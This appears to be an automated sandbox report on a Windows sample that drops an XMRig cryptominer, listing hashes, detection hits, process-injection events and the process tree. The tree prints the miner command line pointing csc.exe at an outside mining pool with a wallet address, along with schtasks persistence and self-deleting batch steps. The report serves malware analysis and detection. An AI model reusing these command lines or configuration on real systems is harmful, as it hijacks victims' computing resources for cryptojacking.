Analysis
max time kernel: 149s
max time network: 154s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 03/06/2024, 08:42
Static task: static1
Behavioral task: behavioral1
Sample: 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe
Resource: win7-20240221-en
General
Target: 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe
Size: 2.2MB
MD5: 91290227566049adfd31ecd4c1296b92
SHA1: 002b9071306530c3915cf27590b8453aa871125d
SHA256: 3295d5e6746be0ceb6557380a4b57e6606e8fad051279a0ff78b3236d7b91bf6
SHA512: 427c5c9d5d1c5e3c19dcd42dd15a386d536e3d6ed7ce7a954bef751add0581a35392c33c3e986116f779dda24072d92a992eef1953e9e58496ab432516a2e509
SSDEEP: 49152:z+5V5bSIh5Robl+Gd6pzGg90o0TickQ7B7Atl9hpHAKf:K75bSynocSQqgqZWjQt7Alfzf
Malware Config
Signatures
XMRig Miner payload (15 IoCs)
resource | yara_rule
behavioral1/memory/920-95-0x0000000000400000-0x000000000057C000-memory.dmp | xmrig
behavioral1/memory/920-96-0x0000000000400000-0x000000000057C000-memory.dmp | xmrig
behavioral1/memory/920-97-0x0000000000400000-0x000000000057C000-memory.dmp | xmrig
behavioral1/memory/920-98-0x0000000000400000-0x000000000057C000-memory.dmp | xmrig
behavioral1/memory/920-99-0x0000000000400000-0x000000000057C000-memory.dmp | xmrig
behavioral1/memory/920-100-0x0000000000400000-0x000000000057C000-memory.dmp | xmrig
behavioral1/memory/920-101-0x0000000000400000-0x000000000057C000-memory.dmp | xmrig
behavioral1/memory/920-102-0x0000000000400000-0x000000000057C000-memory.dmp | xmrig
behavioral1/memory/920-103-0x0000000000400000-0x000000000057C000-memory.dmp | xmrig
behavioral1/memory/920-104-0x0000000000400000-0x000000000057C000-memory.dmp | xmrig
behavioral1/memory/920-105-0x0000000000400000-0x000000000057C000-memory.dmp | xmrig
behavioral1/memory/920-106-0x0000000000400000-0x000000000057C000-memory.dmp | xmrig
behavioral1/memory/920-107-0x0000000000400000-0x000000000057C000-memory.dmp | xmrig
behavioral1/memory/920-108-0x0000000000400000-0x000000000057C000-memory.dmp | xmrig
behavioral1/memory/920-109-0x0000000000400000-0x000000000057C000-memory.dmp | xmrig
Deletes itself (1 IoCs)
pid | Process
2632 | cmd.exe

Executes dropped EXE (2 IoCs)
pid | Process
2492 | 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe
1936 | scvhots.exe

Loads dropped DLL (2 IoCs)
pid | Process
2632 | cmd.exe
2492 | 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe

resource | yara_rule
behavioral1/memory/920-93-0x0000000000400000-0x000000000057C000-memory.dmp | upx
behavioral1/memory/920-79-0x0000000000400000-0x000000000057C000-memory.dmp | upx
behavioral1/memory/920-95-0x0000000000400000-0x000000000057C000-memory.dmp | upx
behavioral1/memory/920-94-0x0000000000400000-0x000000000057C000-memory.dmp | upx
behavioral1/memory/920-96-0x0000000000400000-0x000000000057C000-memory.dmp | upx
behavioral1/memory/920-97-0x0000000000400000-0x000000000057C000-memory.dmp | upx
behavioral1/memory/920-98-0x0000000000400000-0x000000000057C000-memory.dmp | upx
behavioral1/memory/920-99-0x0000000000400000-0x000000000057C000-memory.dmp | upx
behavioral1/memory/920-100-0x0000000000400000-0x000000000057C000-memory.dmp | upx
behavioral1/memory/920-101-0x0000000000400000-0x000000000057C000-memory.dmp | upx
behavioral1/memory/920-102-0x0000000000400000-0x000000000057C000-memory.dmp | upx
behavioral1/memory/920-103-0x0000000000400000-0x000000000057C000-memory.dmp | upx
behavioral1/memory/920-104-0x0000000000400000-0x000000000057C000-memory.dmp | upx
behavioral1/memory/920-105-0x0000000000400000-0x000000000057C000-memory.dmp | upx
behavioral1/memory/920-106-0x0000000000400000-0x000000000057C000-memory.dmp | upx
behavioral1/memory/920-107-0x0000000000400000-0x000000000057C000-memory.dmp | upx
behavioral1/memory/920-108-0x0000000000400000-0x000000000057C000-memory.dmp | upx
behavioral1/memory/920-109-0x0000000000400000-0x000000000057C000-memory.dmp | upx
Suspicious use of SetThreadContext (1 IoCs)
description | pid | Process | procid_target
PID 1936 set thread context of 920 | 1936 | scvhots.exe | 38

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2904 | schtasks.exe

Delays execution with timeout.exe (1 IoCs)
pid | Process
2456 | timeout.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
description | pid | Process
Token: SeLockMemoryPrivilege | 920 | csc.exe
Token: SeLockMemoryPrivilege | 920 | csc.exe
Suspicious use of WriteProcessMemory (41 IoCs)
description | pid | Process | procid_target
PID 2004 wrote to memory of 2256 | 2004 | 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe | 28
PID 2004 wrote to memory of 2256 | 2004 | 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe | 28
PID 2004 wrote to memory of 2256 | 2004 | 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe | 28
PID 2004 wrote to memory of 2256 | 2004 | 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe | 28
PID 2004 wrote to memory of 2632 | 2004 | 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe | 30
PID 2004 wrote to memory of 2632 | 2004 | 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe | 30
PID 2004 wrote to memory of 2632 | 2004 | 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe | 30
PID 2004 wrote to memory of 2632 | 2004 | 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe | 30
PID 2256 wrote to memory of 2832 | 2256 | cmd.exe | 32
PID 2256 wrote to memory of 2832 | 2256 | cmd.exe | 32
PID 2256 wrote to memory of 2832 | 2256 | cmd.exe | 32
PID 2256 wrote to memory of 2832 | 2256 | cmd.exe | 32
PID 2632 wrote to memory of 3024 | 2632 | cmd.exe | 33
PID 2632 wrote to memory of 3024 | 2632 | cmd.exe | 33
PID 2632 wrote to memory of 3024 | 2632 | cmd.exe | 33
PID 2632 wrote to memory of 3024 | 2632 | cmd.exe | 33
PID 2256 wrote to memory of 2904 | 2256 | cmd.exe | 34
PID 2256 wrote to memory of 2904 | 2256 | cmd.exe | 34
PID 2256 wrote to memory of 2904 | 2256 | cmd.exe | 34
PID 2256 wrote to memory of 2904 | 2256 | cmd.exe | 34
PID 2632 wrote to memory of 2492 | 2632 | cmd.exe | 35
PID 2632 wrote to memory of 2492 | 2632 | cmd.exe | 35
PID 2632 wrote to memory of 2492 | 2632 | cmd.exe | 35
PID 2632 wrote to memory of 2492 | 2632 | cmd.exe | 35
PID 2632 wrote to memory of 2456 | 2632 | cmd.exe | 36
PID 2632 wrote to memory of 2456 | 2632 | cmd.exe | 36
PID 2632 wrote to memory of 2456 | 2632 | cmd.exe | 36
PID 2632 wrote to memory of 2456 | 2632 | cmd.exe | 36
PID 2492 wrote to memory of 1936 | 2492 | 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe | 37
PID 2492 wrote to memory of 1936 | 2492 | 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe | 37
PID 2492 wrote to memory of 1936 | 2492 | 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe | 37
PID 2492 wrote to memory of 1936 | 2492 | 91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe | 37
PID 1936 wrote to memory of 920 | 1936 | scvhots.exe | 38
PID 1936 wrote to memory of 920 | 1936 | scvhots.exe | 38
PID 1936 wrote to memory of 920 | 1936 | scvhots.exe | 38
PID 1936 wrote to memory of 920 | 1936 | scvhots.exe | 38
PID 1936 wrote to memory of 920 | 1936 | scvhots.exe | 38
PID 1936 wrote to memory of 920 | 1936 | scvhots.exe | 38
PID 1936 wrote to memory of 920 | 1936 | scvhots.exe | 38
PID 1936 wrote to memory of 920 | 1936 | scvhots.exe | 38
PID 1936 wrote to memory of 920 | 1936 | scvhots.exe | 38
Processes
- C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe (PID 2004)
  Command line: "C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\cmd.exe (PID 2256)
    Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\zbe20246384251130.bat" "
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\schtasks.exe (PID 2832)
      Command line: Schtasks.EXE /delete /tn "Maintenance" /f
    - C:\Windows\SysWOW64\schtasks.exe (PID 2904)
      Command line: Schtasks.EXE /create /tn "Maintenance" /xml "C:\Users\Admin\AppData\Local\Temp\zx20246384251130.xml"
      Signatures: Creates scheduled task(s)
  - C:\Windows\SysWOW64\cmd.exe (PID 2632)
    Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\zb20246384251130.bat" "
    Signatures: Deletes itself; Loads dropped DLL; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\chcp.com (PID 3024)
      Command line: chcp 1251
    - C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe (PID 2492)
      Command line: "C:\Users\Admin\AppData\Local\Temp\91290227566049adfd31ecd4c1296b92_JaffaCakes118.exe"
      Signatures: Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
      - C:\Users\Admin\scvhots.exe (PID 1936)
        Command line: "C:\Users\Admin\scvhots.exe"
        Signatures: Executes dropped EXE; Suspicious use of SetThreadContext; Suspicious use of WriteProcessMemory
        - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe (PID 920)
          Command line: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe -a cryptonight -o pool.supportxmr.com:80 -u 453ys3CV57Nbg2XCekHZdJRHyGd4uSB1oTuWEs5btLfsYDKE71XAmUVYybZXVBeZDS34zWxkWL6pNRNPPXHChq6CGwNa5j4 -p cpu --av=0 -t 1 --donate-level=1
          Signatures: Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\timeout.exe (PID 2456)
      Command line: timeout /t 3 /nobreak
      Signatures: Delays execution with timeout.exe
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 680B
  MD5: a8392a9f77078d7955410a1bf5fa9a82
  SHA1: 8963744692735559bce6322dcdb9a5f67fd952ba
  SHA256: eff1ea1ce1e42d01c25fa203cb2f43316602d2cf51b88ef60ebd6679e57ddb11
  SHA512: 8dd07d99cafbe2bce9402f5eae33bf46e4b1f93b73b5815b5957f444be8c851f27e1143ef7923e86c6b4059f3ba4af8bd1bd37f625cad8c6005c12f75f708777
- Filesize: 198B
  MD5: 98228d10daef5f91cccf5e0fb25f130e
  SHA1: f94ed868eaee3015706b274d7a30f0c7086dc215
  SHA256: d0d065878458a486bb9b453884cce4f0e13b83950f374cb765e2bbc9610995ff
  SHA512: 97eaf08ae5765f90734c762ddd77a196ca86a73f0660c4e8b7970e202487a471196d7ed186ab60b79dffc90d23ef3fa1ea3e44e515f22fe34a965cab09fc95d3
- Filesize: 2.2MB
  MD5: f4cdf35f34063c1b0377008ae133e79f
  SHA1: 935d7e86cfb4d7b853a6e51f7e4ab938a0a46136
  SHA256: 317a902c2d5a9307e87f7e751aff4745379727fa99c9900d387f0eadd4fbbe43
  SHA512: 7c7216b2ed6ca7381a6ff0cc66b04e20720a9bb9b24cedfaa0158204d6bb6f5937dc4ee6c9b3529fbcebf002415792bd7de81cecbbde9c404ae4e709893a1e9f
- Filesize: 1KB
  MD5: bae07d90cc9071ee0f4d37b3f89d6a57
  SHA1: 90b6121e67985028c970bb3b5553324a4f9f611d
  SHA256: 742b5a10cb78290d18a962a81436a61d4d5124e748a5c59681684a924d6545d8
  SHA512: 9a5a143b91cecdda0e2924c467b30b856b0ae501f5c67746ea9c2b60b40666bbe9d101b806740489f2ba92da7a0165fbb44e536c6aedf6002406f506a3c4d9a8